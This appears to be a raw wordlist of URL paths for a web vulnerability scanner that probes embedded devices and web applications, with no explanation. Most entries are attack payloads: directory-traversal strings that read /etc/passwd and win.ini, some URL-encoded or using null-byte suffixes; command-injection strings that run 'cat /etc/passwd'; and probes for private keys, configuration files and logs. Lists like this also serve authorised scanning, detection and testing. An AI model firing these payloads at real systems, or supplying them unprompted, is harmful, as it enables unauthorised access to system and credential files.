/adm/file.cgi?next_file=%2fetc%2fpasswd
/../../../../../../../../../../../../../etc/passwd
/cgi-bin/;cat$IFS/etc/passwd
/command/prima-factory.cgi
/command.cgi?cat%20/etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/action/usermanager.htm
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/../../../../../etc/passwd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/password.html
/conf/nginx.conf
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/lang/log/httpd.log
/eIMConfiguration
/eid-management
/eid-management-new
/bulk-profile-operation

/cgi-bin/dynamic/config/secure/security.html
/Security/users?auth={{b64auth}}
/cgi-bin/privatekey.pem
/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/request_para.cgi?parameter=wifi_get_5g_host
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/Portal0000.htm
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/portal/conf/config.properties
/images/../../../../../../../../etc/passwd
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/password.cgi
/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/js/../../../../../../../../etc/passwd%00.jpg
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/wt3/forceSave.php?file=/etc/passwd
